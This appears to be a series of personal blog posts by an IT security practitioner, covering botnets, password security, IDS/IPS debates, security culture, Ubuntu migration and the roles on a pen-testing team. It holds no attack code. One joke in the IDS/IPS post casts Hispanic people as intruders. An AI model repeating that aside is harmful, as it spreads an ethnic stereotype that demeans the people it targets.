But now I see Chris Brunner did some of the hard work for me of culling out the less useful podcasts, and created a list of them on his own site. I need to update my own geek site links with a few of these new ones that I didn't have, and check into trying to resurrect this habit pursuit. I'd love to keep up with security through this media as well as print news.

A recent SANS Handler Diary entry reminded me the importance of keeping at hand a list of The Questions that we should ask as IT and security professionals. I need to keep updating this list, as they will all likely be questions I will want to keep at hand throughout my entire career.

- If hard drive X were to die right now, could you confidently rebuild it using backups or other documented knowledge? This applies to any system from the most critical server to the least important spare system to any employee workstations.

- If incident X were to happen right now, what is your response procedure? Apply this to the most benign alert up to a major hacking incident that is right now being executed, successfully. Would you have an available audit trail?

- How do you know your network or systems are secure?

- How do you know that there are no rogue wireless access points giving access to your network (or that your users might be hopping onto nearby)?

- Are network diagrams, documentations, and inventory up to date? Include process documentation.

- If one of your users (CFO to call center ops) is specifically targeted by a 0day emailed exploit, how will they react? Is user education appropriate and is IT held in enough regard to have incidents reported?

- If a complete network audit were to be done now, what might you be surprised to see still in service, accessible, or configured? Yes, even networks need flushed and cleaned out and retooled regularly.

I hope to add more.

eWeek poses the question on whether the botnets have already won. Botnets are not new, but they have been hot news for the past year or so. Unfortunately, while technology likes to move quickly, and vulnerabilities appear and disappear even more quickly, botnets are a fact of life on the wire that is not going to go away any time soon. In fact, I firmly believe we've only just begun to see the power, effects, and changing landscape of the wire that botnets are catalyzing. The article mentioned is an excellent look at the situation.

Defending against botnets is difficult, if not even outright impossible right now. Traffic jamming at ISPs or even local networks is useless when the bots tunnel through common ports. Traffic inspection is useless when the bot traffic becomes encrypted or the attacks themselves are real traffic. Shutting down C&C servers is futile now that botnets can work with existing dynamic features on the Internet, can become smaller automous units, or just plain efficiently change servers in an instant. Centralized tracking, detection, and disinfection of bots is not cost-effective for anyone because many home users who are infected have no idea they are infected nor have any idea how to fix it without a lot of hand-holding. Besides, it is a common fact that securing every system on the Internet is just not going to happen. Coordinating efforts across nations and continents is not supportable at this time, and even if an effort got underway, laws are still far behind technology. Botnet code can be reverse engineered and attacked directly, but much like signature-based detection, is thwarted by even as little as a single bit change, let alone polymorphic code. And attempting all of these things is still tough to do in as lucrative and profitable a way as the attackers. The article even mentioned that some significant work is done by volunteers.

To strike up a poor analogy, imagine that cars are able to be controlled remotely (not all that far away considering we can monitor the status of cars now and unlock them from a central system or intall navigation systems), and I have a way to control half the cars in your neighborhood. What would happen if I have them all play demolition derby with your house? Imagine that some of them are unmanned, but some are manned with trapped drivers. You can build walls, attack each one with rockets, put mines up all over, build a basement they can't get into, build fake houses so they may or may not get your real one...

So, what about beating botnets? Where are some of the weak points to attack? Well, first of all a botnet might be able to be wielded against a botnet, although to what aim, that is a bit unknown as are the ethical implications. However, it is only a matter of time before a government decides to have its own botnet for cyberdefense and attack reasons. Whereas so many simluations talk about targeted attacks and actual hacker penetrations shutting down systems, something as simple as a coordinated, specific DDoS attack by a botnet can stranglehold critical services. Ask any company that has gone out of business due to a sustained DDoS on their systems.

Botnets, in the end, are still controlled by one or a small number of skilled people. Those people need to be ferreted out and shut down or neutralized or brought to justice. While law enforcement is still largely powerless against foreign-based attackers, I can foresee a time when more secretive agencies or corporate-sponsored groups clash on the cyber battlefield as both attempt to protect their interests. Still, take out the people doing the intelligent coding...

Corporate IT security can move outward to protect employees even at home or on home networks. The real skill in cleaning infections and increasing security at work or at home still lie with IT professionals getting their hands dirty and educating users, even just a little bit. While corporate entities can do a decent job internally, so often we shy away from opening the doors to home support (and mostly rightly so...). It definitely would take a commitment from top management, but does make sense even from an HR perspective.

Better Operating Systems and security products for the home would be a step in the right direction, but will never be more than a variably-sized speedbump for botnets and attackers. Still, some protection is better than none, and a secure or less popular OS is better than putting oneself in the midst of the low-hanging fruit masses.

No matter how this plays out, the botnet war is worth watching. This is still only the beginning and is a major issue that few people want to talk about because of how debilitating it can be and how nearly impossible it can be to defend against or prevent. But this is a topic that will be shaping our security and maybe even our networking as a whole for the next ten years. Mark my words. :)

I am amused and irritated by regular news reports lately that come in one of two flavors.

First, the articles about how information disclosure occurred at an organization and that X amount of people were notified, a hotline set up, and a web site created with answers to common questions that the possible victims may have. While all of this is good and detailed, rarely is there any discussion on two things I most want to know: How did the attack occur, and what assurances are there that the information on the system was all that was exposed? My guess is that these are cloudy questions with even cloudier answers...which troubles me.

Second, articles that state an organization thrwarted or repelled a hacker attack. Ok, how do you know there was a hacker attack? Who was it? What did you do to thwart it? Was there even an incident at all? I guess if I wanted to drum up my IT team, I could spread word that when Snort gave an alert about a sendmail.pl exploit attempt against my server (captured in IIS logs) that doesn't even affect anything on my server nor would ever potentially affect it because we don't run sendmail, I can go ahead and raise the flags and drop confetti because my team...hell...*I* saved the day and thwarted a hack attempt!

As a technical individual, I am quickly requiring details, or it didn't happen. Screenshots or it didn't happen!

I love articles like this short bit about password security from eWeek because there are simple parts to them that I like and other parts that I really disagree with.

What I agree with: Yes, I truly think biometrics will continue to increase in widespread use, even down to individual systems. But unlike passwords, the simple use of these things can provide false positives or true negatives and will not reduce any dependency on help desks. In fact, help desks might be even more encumbered as fixing biometric logon issues is a bit more complex and dangerous than just resetting someone's password.

Yes, I think single sign-on technologies should be focused on as much as possible, even though they tend to be a luxury for many IT departments as opposed to what just happens. But single sign-on technologies should not be confused with actual authentication technologies. They are separate entities.

And yes, users tend to write down their passwords just like people put spare keys under their car, under the doormat or nearby garden rock or on the back door frame.

What I don't agree with: Passwords written down on paper are better than easy to remember passwords that are not written down, especially passwords that are too simple. While a complex password might be written down on paper next to a desk, an attacker still must have local access (either personally or through an insider) to the physical facility to read the paper. A simple password on a networked system can be guessed or cracked. So I find it dubious to dismiss passwords simply because they can be written down. For technical peope who are comfortable with passwords and password safety, they are just fine.

No IT help desk should complain about user password reset requests. That is why that business function is there, and any alternative is going to be more of a headache than verifying the user and resetting the password. This should not be an argument for alternative forms of authentication.

In the end, there is no 100% perfect authentication system, which is why I dislike articles like these which try to dismiss one because it is not 100% perfect, and market others (whether a new idea or just the same old rote from 2 years ago, like this article). Yes, passwords have issues and there are risks associated with any level of their use, but they are easy and are going to continue to be used for many, many years to come for a variety of things (although perhaps the highest security for information and perhaps corporate use may shift as higher order tech lowers in cost).

I just have to say I think more blogs should email commentors on responses to their comments. Too often I make a comment that I'd love more dialogue about, only to never remember to hit that blog again until more news has buried what I commented about. I don't like fire and forget blog comments...but I frequnetly forget to check back. I imagine I am not alone.

Then again, perhaps that would get spammy with lots of commentors...and that might be open for abuse as well.

Dang, well, the idea SOUNDED good... Hmph.

The more I work in small-medium companies that act as ASPs (application service provider, i.e. we host servers that our clients use), the more I realize there comes a point where process outweighs getting things done.

Instead of fielding requests as they come in and just getting the work done, change management starts to tickle the back of the throat and more and more, documentation and process need to be invoked. When a request comes in, a process is begun to deal with that request and tie it into any other processes.

For example, an SSL renewal is not just an SSL renewal anymore. Not only does it need to take place on the web server, but the new SSL needs to be imported into our IDS/IPS to decrypt the traffic. While one person doing all of this can keep track of it, eventually as growth continues, multiple people doing these things means they may possibly get lost. Ack! ...And this is one of the simple ones.

What makes all of this even more fun is the propensity for people to want to avoid documentation and process and change management. It slows things down and sometimes brings out some weaknesses in how people document and write and attend to detail. In fact, out of about 25 IT people I have worked with extensively, only about 4 have not heavily resisted these tasks (this includes.

This is kind of a reason I include a line on my resume below my college degree that states I have also have a background in "environmental sciences." There is nothing like lab work in genetics, biology, physics, or chemistry to ground oneself in documenting observations and drawing valid conclusions which can be recreated and clearly conveyed to others. Having had an interesting 2.5 years of that work, it does make a difference when troubleshooting networks and documenting process.

Mostly posting this here just to save this link for myself. This is a nice list of some of the more dangerous things users do online. This is not everything, but hits many points, in order of descending severity:

- Clicking on email attachments from unknown senders
- Installing unauthorized applications
- Turning off or disabling automated security tools
- Opening HTML or plain-text messages from unknown senders
- Surfing gambling, porn, or other legally-risky Websites
- Giving out passwords, tokens, or smart cards
- Random surfing of unknown, untrusted Websites
- Attaching to an unknown, untrustworthy WiFi network
- Filling out Web scripts, forms, or registration pages
- Participating in chat rooms or social networking sites

Somethings I would add: participating in P2P or IM services at work; not evaluating information that they send out via email whether their audience should be reading it or not; purchasing and installing random devices on their computers (ipod, wireless APs, mobile handhelds...); and the list can go on...

Thought for the weekend.

Microsoft wants to fortify its own operating system, Windows Vista. But will it be forced to keep the OS insecure because there is a big market for companies that secure Windows? Imagine the extreme. What if Vista were a highly secure OS? Would these companies curse Microsoft for putting out a good, solid product?

Talk about a bad situation...

Just wanted to again mention that Google Reader is amazingly awesome. It has certainly solved my problems with managing news sites, reading news daily, blogs, and rss feeds.

Google is doing something right with their "web 2.0" apps or pseudo-web 2.0 apps depending on whom you ask. I really appreciate the ability to look at my news sites from any system from any net connection. I think as the world becomes more mobile and people begin to have multiple computers (and devices) both personal and even counting their system at work, the freedom and demand to be able to access things remotely is going to increase dramatically. And it is not enough to push VPN technology and remote control solutions (all those RemoteToMyPCAnywhere sites can go to hell, really). In the end, the most-used apps are going to slowly creep towards being web-delivered just like webmail is. I can access Gmail from anywhere and get the same experience as if I were on my personal machine. I can do the same exact things from my Linux and Windows boxes, just by using a web browser.

Google has a good head-start here by identifying the most-used apps on computers, and attempting to replace them with web-driven alternatives. Email, IM, voip, Office, news (RSS), entertainment, and so on.

It is no longer about being able to roam from computer to computer in a corporate environment and have my own profile and settings and apps available. It is about roaming anywhere in the world and still having everything I need.

Ira Winkler from ComputerWorld has a rather controversial article up about the separation of ethics from computer security. This is IT journalism at its most typical: they can write about it, but they don't know it. He does have some points, but otherwise he also has dubious claims.

There are a few things Ira conveniently leaves out or is not even aware of in regards to this subject.

1. The methods to detect, investigate, and enforce ethical behavior on computer systems utilize many of the same functions that computer security uses. This means there is a natural integration of the two. Computer security requires virus scanning and data/file inspection of some sort. Unethical copyright distribution will utilize similar tools and the same staff.

2. There is a tendency to generalize. If someone is visiting bad web sites that are unethical to visit inside the corporate network, there could be security implications. Too often, those same sites house malware and other bad things. This is just a tendency, but that is what computer security is about. It is not just 100% black and white. The twin goals of ethics and security help to fully dictate that those sites are offlimits and against policy. In short, why make two policies when they support each other?

3. If there are too many points to make when educating users on computer security and ethics, that is not an argument to separate the two entirely. It just means the education needs to be structured better to accomodate making only one or two points. Perhaps ethics can be split off during the education process, but this is simply not an a valid supporting argument. It would be difficult to teach users about email security, password complexity, phishing attacks, and proper data usage in the copy room at one time as well. So does that mean those should not be computer security as well?

4. What does Enron have to do with this discussion other than being an excuse to bring up a popular culture/media example?

5. What does physical security have to do with this argument? Yes, security staffers may be disdained for being those who mete our punishments, but it makes no sense in an argument to separate ethics and computer security. The argument would be to minimize our negative impact on users. Well, by that token, should we separate out incident response, since that tends to be negative? What about when a virus is detected on a machine and we have to go inform the user and slap their wrist for downloading it in their email and saving it? This argument makes no sense.

6. Ira would have been better served by not bringing up phishing attack examples and how those are mechanical in nature but ethical decisions are not as straight-forward. Tell that to the people doing studies on how difficult it can be to detect phishing websites. In fact, I would conjecture that most unethical behavior in a workplace is *easier* to determine than some of the "mechanical" computer security issues, especially for non-technical people.

The best part of the article is how Ira even attacks his own argument and makes no real effort to address it. The ending feels very bipolar like he had an argument, didn't win, but then just moved on.

Now, all that said, there is merit to saying ethics should be separated in part from computer security itself. IT staffers may detect and report on unethical behavior, but ethics is still ultimately up to legal, HR, and corporate executives to determine. But that is not enough to say that ethics and computer security should be fully separate. There is too much at stake for business and security staff to try to fully separate these spheres in anything but a very large company that can have separate ethics staff. Even then, those teams will work closely together anyway.

In my previous post, one bullet point was brought up about physical security and computer security and Ira Winkler brought up that physical security is often welcomed while computer security staffers are often not liked. Why is this?

The biggest single reason is simply rooted in culture. At home and outside work, people use computers in their daily lives to do many, many things. From looking at maps for driving directions, popular news, entertainment, distractions, looking up information on a topic, meeting new people, remeeting old friends, and on and on. Computers are used at home in a variety of ways, many of which are not necessarily safe, ethical, or healthy.

Physical security is present to make sure people don't go where they should not be going, etc. This is not necessarily bad for people as they are not being limited in a way that takes something they would have already had. They didn't have that access anyway, so there is no loss. But when security imposes computer limits (or the technology imposes those limits), no matter the benefit to the company, those actions involve taking away what users would normally be able to do.

Another lesser reason is the presence of physical security and the smiles they can give. Unfortunately, computer security staffers can't smile through the computer as user data flows by their gates. Thus it can be easier to get mad at the unseen people in the security cubes. Likewise, as part of the general masses, people feel a bit safer and unconsciously accept the security of physical security guards and locks much easier than they do technical security measures and limitations. (This is the only stable reason for most of the TSA regulations; they shallowly make people feel safer without being really all that effective once you start thinking about it.)

There have been a load of posts and discussion on high-profile blogs and mailing lists about the value of IDS/IPS. Richard Bejtlich, Thomas Ptacek, Alan Shimel, Amrit, and others such as the Daily Dave have all chimed in along with their respective gaggle of comments. Lots of people get pretty vehement and passionate about this subject.

An IDS and an IPS are two wholly different things. Any discussion needs to start by laying the groundwork on which one is being talked about. The next step is to describe how the discussors define an IDS/IPS. Lastly, review their respective expectations of those IDS/IPS devices.

I really like Alan Shimel's descriptions of the "trough of disillusionment" and "peak of inflated expectations." I really think there are some skewed expectations of what an IDS and IPS are supposed to do. Of the two devices, I really believe IPS is the one that has had such high expectations that it will not be delivering satisfactorily, ever. IDS, on the other hand, has been mistaken to be IPS very often.

To me, an IDS is lumped with other functions such as logging, syslog analysis, intrusion response, snmp monitoring, and other network/performance monitoring. All of these functions tend to detect or record, providing information or alerts during and after the fact. They are passive technologies that do not take specific action beyond ringing bells and blowing whistles.

IPSs are in the same category as firewalls, antivirus apps, spyware cleaners, web filtering proxies, and spam gateways. They take IDS one step further by actually performing some action based on the alerts, from changing firewall rules to dropping traffic to throwing out TCP resets. As such, they fall into the problem of stopping things that should be allowed, or allowing things it didn't know where problems.

IDS/IPS functions are not on my list of the top things to have in a corporate or home user environment. An IDS can detect and alert to events happening that may or may not be malicious or problems. This is certainly a valuable function, but not so valuable as to trump very many other things. IDS technologies tend to be the pet projects of geeky admins that have some time on their hands. The rest of us tend to have other fires that need putting out over babysitting an IDS/IPS device.

Personally, I like IDS for the knowledge and monitoring it can provide about the network. And that is what the real expectation of an IDS should be. The information it provides to better inform those who perform subsequent actions, but only in correlation to how well the device, network, and tuning is understood. IPS devices I can do without unless the environment is so huge that it needs automated responses, but even then the environment is likely so huge that only a handful of IPS-enabled (active) rules will be enabled.

There is a challenge floating around about whether there are any instances where a company was "saved" (benefitted) from having an IDS/IPS device in use. I have not had one personally, but I can certainly think of situations where someone might be throwing internal exploits at LAN systems in an attempt to break into a system, or maybe a worm trying to propogate over the network. An IDS can alert on an otherwise possibly overlooked situation and flag it for investigation. However, as much as an IDS can be helpful, every other layer of technology steals a little bit of its thunder. Network or even host-based firewalls and antivirus will lower the value of the IDS because a lot of malicious stuff is stopped before it traverses the network.

Think of it this way. An IDS/IPS is like a home security alarm system. The IDS will log attempts to break in, possibly track where the thief moves throughout the house, maybe even determining the method of breakin, and will alert the owner that a break-in is occurring and has occurred. An IPS does all of this, but also rings a loud alarm through the house, turns on all the lights and a spotlight, seals away the family valuables, locks all the entry points, and lets loose dogs to chase the intruder away, actively preventing the success of the attack. In light of this analogy, both systems will have had a very valuable effect at some point (that is not to say the IDS/IPS tends to warn when even an insect alights on the window pane or that they don't detect hispanic intruders...).

Update: More posts are popping up on this topic. The Digital Voice has chimed in as well, with a nice post and viewpoint. TechBuddha has some thoughts as well, about finding your own truths and relax a little bit when it comes to arguments like this. Sawaba at SecuriTeam chimes in.

The weather in the midwest has just recently taken a dip into the cold ranges with plenty of wind added in. Walking to my car for lunch this afternoon found me thinking about analogy for how networks are planned and built.

Think of a child's toy closet. At some point, the closet does not have much in it, maybe just whatever the parent puts in there, most likely some child-related paraphenelia like cribs, strollers, and other things not very interesting to children but necessary for initial childcare. But as the child grows up and time moves on, things are acquired and put away. Maybe some new toy franchise comes along and over the course of 2 years the child builds up a nice collection of toys which then get shoved into the closet wherever they can fit. One weekend a television ad book-ended by a favorite cartoon prompts a new impulse purchase later that day for some rather unwieldy toy aircraft that gets pushed into the closet as well. Perhaps a series of books and shoes get piled in there. No child truly likes shoes and clothes, so they tend to get thrown in with even less regard then normal, falling on the floor of the closet or across various toys.

This slow building of toys and items fitted into various nooks and crannies and sometimes just plain thrown in eventually make finding the good toys a little more difficult. In fact, some toys may end up forgotten about for years, sitting in a dark corner along with a few unwanted guests: shells of crickets and other insects. And when a wanted toy is needed, rummaging through the mess to pull it out while hoping the mountain of everything else doesn't topple out on top of it can be a harrowing experience. And we all know that the subsequent shifting of items will mean placing it back in the closet later will find it in a new place tomorrow. If other junk does fall out, chances are it is all just pushed on back inside in whatever fashion it can fit.

This may eventually mean that friends who stay the night can get away with snatching a toy without anyone knowing it. Or may perhaps wreak havoc with pulling our precariously perched parcels only to topple mounds of others.

And what about those toys received over Christmas and birthdays that are sometimes unwanted and unasked for. The useless junk that accumulates due to what other people thought you might make use of, or trendy toys from years past.

Ask any parent how the image of a child's toy closet left uncleaned for 4 years makes them feel.

The only way to combat the closet trash mess is with regular cleaning. Take everything out, and put it all back while culling the unwanted.

Networks are similar. Over time, they can become completely unwieldy entities with lost applications lingering in dark corners, unwanted guests never detected, a mish-mash of interconnected parts that depend on each other to avoid falling over into a mess when in fact each can stand on their own if but for a little bit of planning. And how can you truly plan for the future when there is no clue on what the next hot toy will be, or the next ad that is seen on television with that inpulse "must have this now" item?

We have a problem in the security space.

It is widely touted that marketing and ill-informed managers and non-technical C-levels are looking for silver bullets when it comes to computer security. Most security experts will respond that there is no silver bullet. In fact, we say this a lot even though no one is truly arguing this topic...at least not anyone important or knowledgable about our industry. We seem to just like saying it amongst each other.

Now, speak to security researchers about wireless security and the use of WEP. Some will get very vehement in saying that WEP is broken and useless and get rather vicious in deriding anyone who says they use WEP for their home wireless network.

See the problem here?

What is disturbing is the ability for us to completely reject a countermeasure or protection as worthless just because it is not perfect, yet we reject the concept that there is a perfect countermeasure. In the above case, WEP may have holes and be easily broken to someone with the knowledge, but it still has value because it can block a large group of unskilled attackers. IDS may be circumventable and may not catch everything, but it still has value to catch the low-level stuff and mass attacks or worm traffic and such.

We should always be careful not to think there are silver bullets in security but yet fully reject bullets that are 25% silver. Every little bit that we can raise the bar for attackers is a little bit more security we will gain.

As I look forward to the future in regards to security and technology, I relaly see a very muddy, grey haze when it comes to privacy concerns. Mark Rasch has a nice article where he makes a lot of little, very important points about privacy in the workplace. As we embrace technology more and more, and begin to mix workplace computer use with social computer use, this topic is going to continue to be complicated and muddy. In the past we only had phones that might be used for personal activities now and then, or they might be recorded although most companies did not have those capabilities. Now, we have many more avenues to mix work life with non-work life, technologically, and we also have many more possible ways to record and monitor (VoIP, IM, blogs, Email, files, cells, wireless...).

When you can get a report on the attitudes of 213 execs in regards to security, you definitely have to check it out. Sadly, the report is only open if you pay, but Dark Reading has a quick synopsis of it. The synopsis takes a look at why execs are not taking security more seriously.

I love their first conclusion that most execs see security as an operational function (part of facilities) and not a strategic one. Far too often (either due to perception, lack of taking responsibility, or just execs not even knowing their own role) no one thinks about what the true purpose of a CEO is. CEO duties should be strategic, and as such, they do not want to deal with mere operational trivialities. Those are rightly delegated down to upper level managers and such. Some small-medium companies have CEOs that tend to meddle in both areas (especially when that person holds multiple titles like CEO and President), but this should always be evaluated: Where should the buck truly stop for non-strategic issues in a company? Who is signing off on operational budgets? Unless the company purpose is in security or some other critical infrastructure that depends on computer systems, the buck will stop lower than exec levels.

Some other reasons posed: security managers tend to be separate from other business managers which in turn gives them few allies to leverage budgets and attention. They don't know how to align to business objectives.

Execs see security only under certain circumstances, with their main motivators being: meeting government and other regulations, protecting confidential information (I bet that refers to internal company information and IP as opposed to customer data), and business continuity.

What can security managers do? They can reach out to the rest of the business. They can pair up with risk managers. They can get more face time with managers so that they can get some allies to align to their initiatives. They can create metrics that execs can understand so they can get budgets to do what they need to do (e.g cost of business interruptions, vulnerability assessments, and industry benchmarks). The big theme here is to align with other business managers.

One thing this report on the research does not touch on is something I think could help as well. Security is almost always seen as a punishment vehicle, where freedoms of managers and employees are limited a bit more. Most people think they would rather be free of constraints (security function) as opposed to governed by them (oddly, I think most people thrive best under constraints and are lost like sheep without fences when given free reign). This means security is seen as a negative money sink that keeps slapping their hands when they want to do things or make money. Really, few people like security. And when they are indifferent, they are usually just denying what can happen (for instance, we all know how easy it is to have our house broken into, but we don't buy alarm systems because that is an overt acknowledgement that we could be broken into; by not buying the alarm system, we subconsiously pretend it is not a problem to worry about...denial).

I feel that security could best be aligned with IT functions (or be integrated deeply into IT functions) or with financial functions. Having a very separated security entity, I bet, can be a very isolated feeling in a company.

Thankfully, I am not a manager, nor do I expect to be one for at least another 5-8 years and all of this is just more information in my head to try and keep an eye on the big picture.

This article (found via Hardocp.com of all places) explains two important things. First, the difference between hygiene and motivational workplaces. Second, the nine things that developers want. Honestly, this can be expanded beyond developers and into network engineers, security professionals, and IT staff in general.

Sadly, I work for a company that is only about 450 employees small, but is firmly of the "hygiene only" mindset. The benefits are excellent, the pay is more than competitive, and everyone is just pretty comfy in their jobs. The company does not score even one point in the motivational items. Even more sadly, those are the points I value the most.

For now, I am refusing to use the term "less-than-zero-day" for a vulnerability that is unknown but actively exploited. Zero-day then refers to an exploit in the wild that is not patched yet, but is known (the time between notification of vendor and vendor-issued patch). I see no use in this cutesy term...just call anything before a patch or vendor-issued workarounds a 0day for all our sakes...

I put my Ubuntu move on hold for a few weeks, but I'm back to it now. Having set up many Windows systems in the past, I know how important it can be to document the process, especially for something new like Ubuntu (hence some of my previous posts on this subject). I've taken to keeping a log of the apps installed, changes, and commands I run.

In migrating to the new system, I'm really happy when programs include easy-to-use exports and imports to transfer information from one system, or even OS, to another. Firefox allows me to export my bookmarks (which have swelled terribly!) and then import them into Ubuntu's firefox. Wahoo! Sadly, Thunderbird does not allow this with mail and mail settings. I can do this from one Windows box to another (just copy the profile folder), but have not yet figured out how to do this over on a Linux box. Ah well, it would only take a few hours to set everything up as I had it before anyway. This just shows how valuable remote services like Gmail and Yahoo are for less technical users. Lose your system or get a new one? Just log into webmail and you're back where you were before!

So, the migration is moving forward. The last task to (nearly) fully get away from booting Windows is to utilize wine and vmware. I searched for some information and stories on installing vmware workstation and found this amazing checklist for an Ubuntu install. Much like so much coding, why reinvent the wheel and make my own when I can just borrow chunks of this guy's checklist? He even has most of the steps I've already gone through, and it looks current! Definitely an inspiration and a great help in making sure I have what I want.

Hopefully by the end of the week I will have a vm set up for Windows which I can pop open when I need to quickly use some Windows program without booting over to my Windows install. In addition, I'd like to get one or two things to work in Wine as well, but the VM is an easier and quicker step for me right now.

As far as getting more things to work, I've become very happy with mplayer as opposed to Totem (the default Ubuntu media player). Totem did not like Divx files (been downloading HOPE presentations) but mplayer rolled right with the punches and played them back just fine.

(Sometimes I do some thinking on my walk to my car for lunch; sadly, the time when I usually don't have anything upon which to take notes...)

Since I openly contrasted my latest two jobs earlier, I was thinking about their differences. My previous job preferred to get things done, and think about security later. My current job has a few people who prefer to wave security around as a business barrier.

But perhaps that is just something security will very often be. Something tacked on only after it is known that something will work. Why stifle a business or initiative with security when you don't even yet know if the business or initiative is even viable?

I think this is why developers and programming instructors have such a hard time with security in applications. Functionality is the key component. If it has security but is too late to save the business, what good is it? If it can be delivered on time and let the company flourish, but with less security, is that not better?

But how far do you go with security or insecurity? Therein is the art of risk (which I truly think is an art, and more difficult than anyone really expects). Do you kill a business by paralyzing it with security paranoia and control? Do you let it run rampant with zero security and not even any locks on the doors? Do you do just enough to satisfy negligence? Do you fling up stop signs or just directional cones?

Like every discussion on security, there are exceptions, there are varying levels and tolerances between technologies, companies, managers, and so on. Not only do we not have a silver bullet device to provide security (and never will), but we also don't have silver bullet methodologies or even approaches that can cover all those differences. Therein also lies friction between finance/auditors, management, and IT/security. It can be artful, subjective, which flies in the face of objective approaches...

One thing we do need, as security practioners, is the constant harping of media about security issues, whether accurate or not. Too often security is only focused upon after an incident or after some insightful awareness presented to management in dreams of angels and fire...but at least media can help keep the minds that be where they ought be.

Been thinking now and than about being on a pen-testing team. Oh how I would love doing that job! So, sometimes I think about the make-up of such a team. How would I design one? Now, I'm not a business manager so having a 50-person team may sound great but is likely not cost-effective. So, I'll try to give my take on a "perfect" pen-testing team and their roles, as sketched in my own head. Note that some of these roles can be combined into single people.

The Lead - You need to have a lead person, most likely a very presentable and articulate senior person who is most likely to be the face of the team to the client. This person should also have coordination and delegation duties and be almost like a manger, most likely with some managerial experience to manage the team properly, keep them motivated, but also be able to relate to client managers. This is the coach and mentor.

The Interviewer - This role is an expert when it comes to policies, regulations, standards, and interviewing the proper people in a proper way to get definitive answers on a company's strength with its people and processes and policies. Someone should, at the very least, be able to interview others properly and understand regulations inside and out (COBIT, PCI, etc). This person should be able to evaluate whether reality matches policy. This guy would be as close to an auditor as the team gets, and could also be familiar with risk analysis.

The Writer - Every pen-test includes reports and deliverables, and the more polished those deliverables look, the better. Every team should have someone who is strong with writing documentation, compiling information, evaluating results, correlating the risks to the client, and dealing with information in a constructive mannger. This person can also be the information-gatherer who can utilize search engines, DNS queries, and other reconnaissance means to profile a target. Even better, this person should be adept at vulnerability assessments and determining how important particular vulnerabilities are.

The Junior - Let's get this guy out of the way early. There should always be some new blood on the team in the form of a junior guy. This guy may have any level of skill, but is the one doing the "easier" errands on the team. Host sweeps, port scans, Vuln scans, password cracking, and coffee-fetching. In fact, this guy can also do some of the widespread repetive things like exploiting various systems using automated tools, sifting through confiscated data and systems for juicy information, and might also best be suited to help support the systems for the rest of the team.

The Web - Any real pen-testing team should have someone proficient with web coding practices and languages, and the security of them. He or she should be the lead when it comes to source code analysis, web app scanning, fuzzing, SQL injections and queries, and best-practice approaches. A background in web servers and database servers would be beneficial.

The Exploit - Someone on the team should also be proficient with other coding disciplines such as Perl, Python, C++, and so on. They can work with and device exploits either pre-discovered from outside sources or custom scripts to discover new exploits. This person should also be able to evaluate and fuzz and test applications beyond web-based ones, such as web servers, email servers, DNS, etc. If a port is open on a server, this member should be the one poking at it the most. This guy should be an expert on buffer overflows (stack and heap) and most likely with malware creation and reversing.

The Packet Hound - Part of any pen-test should include networking devices and information leakage directly on the wire. Packet hounds tend to love sniffing traffic, tinker with networking devices, know the ins and outs (and arounds) of IDS/IPS and firewalls, map the network, and be able to penetrate and evaluate network devices and configurations. This guy should also be familiar with VoIP, phone systems, and wardialing. If you want a meaningful network tap in a crowded server room, this is your man.

The Wireless Expert - Anymore, wireless and mobility is a big thing. It is a benefit to have a team member who is proficient with wireless technologies to evaluate and penetration the security of mobile devices. This should include PDAs, laptops, and wireless networking.

The Social Engineer/Thief - Any team doing black box or physical assessments should have someone skilled with social engineering. There is no more successful an approach to breaking into a network than social engineering. This person should be adept at the common approaches to getting people to divulge information or do something that is otherwise a security risk, from opening email attachments to holding the door open after a smoke break. Lock-picking and physical security alarms and countermeasure knowledge is necessary; perhaps even someone with burgling experience and the willingness to get dirty with dumpster diving. (Note: since this is a rather fun and different task, other team members could enjoy helping out as long as someone on the team can act as a lead expert for this activity.)

They don't post all that often, but when they post, they post excellent stuff over at ClearnetSec. The latest post touches on an investigation at a financial institution in regards to an apparent compromise.

We desparetly need more reports like this. No, I don't need to know specifics or enough to know who the victim is, but we need to know how these things are found, what worked, what didn't, why did it stay undetected for a year, what else did the attacker do? Was it just one mistake that let them in and they could slowly own the whole network?

We have tons of journalists and media reporting on best practices and how to theoretically protect data and what should and shouldn't be done in retrospect to the big media-covered incidents. Very few of these reports seem to be written by people experienced in the trenches, experienced with the trials and realities of the network. They are all very pundit-sounding and academic dreams of puppy dogs and sunshine and flowers.

We need to move away from those media reports and theoreticals. We need to divulge information amongst ourselves and figure out the reality. It is golden when you can take out a pen tester for some beers and start shooting the shit about how they've yet to test a company that wasn't rooted, or what works most of the time and what doesn't, or where some of the oft-overlooked nooks and crannies of networks are, or the most obscure attacks they've completed.

We need more surveys and reports like Jeremiah Grossman's surveys about web application assessments and security, only we need them about actual compromises either real malicious ones or pen-tested ones. We can't wait and pretend they aren't there, nor can we wait for the budget or big media events to remind the C-levels about the risks. We need real, technical reports. Give me a tehnical report, and I can distill that down to language my parents could understand. That's what I soak up.

Every now and then an article is published this is not only a pleasure to read, but is just packed with information and true forward-thinking content. I just read such an article from Wired.com about the future of searching and computing.

This article intertwines the stories of Google, Ask.com, and other search engines with the future of technology. The rise of RAM. The age of low-cost massively parallel computing (cloud computing) and the fight it will have against decentralized computing (and information). The emphasis on network speeds. The usually unthought-of challenges and costs of electricity and cooling for such huge data centers. China and their pursuit of nuclear power.

An excellent article packed with tons of tidbits around the core themes and dressed up with beautiful writing.

We need more technical reports of incidents, damn it! However, it is fun to infer various tidbits based on traditional media reports like this article about a previous manager causing revenue loss in a movie theater chain. The man was able to cause the chain's e-commerce sites to not process online ticket sales for a period of time.

What I found most interesting is that a wireless adapter was identified as a culprit. This implies that the movie chain had wireless employed. Enough such that this former manager was able to get into it and also access the web servers or other critical infrastructure. This is terrible network design, security, and architecture.

This man was the former director of information technology. Perhaps they didn't have anyone around after they eliminated his position to ensure that passwords and access were revoked. Maybe they did change it and he just broke in on his own accord, but any time an employee is removed against his or her will, evaluation and action must be taken to ensure they do not retaliate.

After reading far too much vendor-crap this week, and publications and reports whose basis is in the industry ("We now need to get away from firewalls and IDS and protect data..." translates into "We've saturated firewall and IDS markets and need to drum up the next big market to hawk our warezin..."), I've decided that security professionals (and IT in general) need to work hard to take back our reports. We need to wade through and chase away the ghosts of all these vendors pushing their own agendas as the next big thing, and get back to reality and what really needs to happen.

For all the hype and reports, you'd think we don't need patch management, inventory control, or firewalls anymore. At all. Or that once these things are implemented, that's it. Move on. Fuh-geddaboutit! Oh wait, we need to monitor and update and take care of these things and check logs and stuff? Wha...?

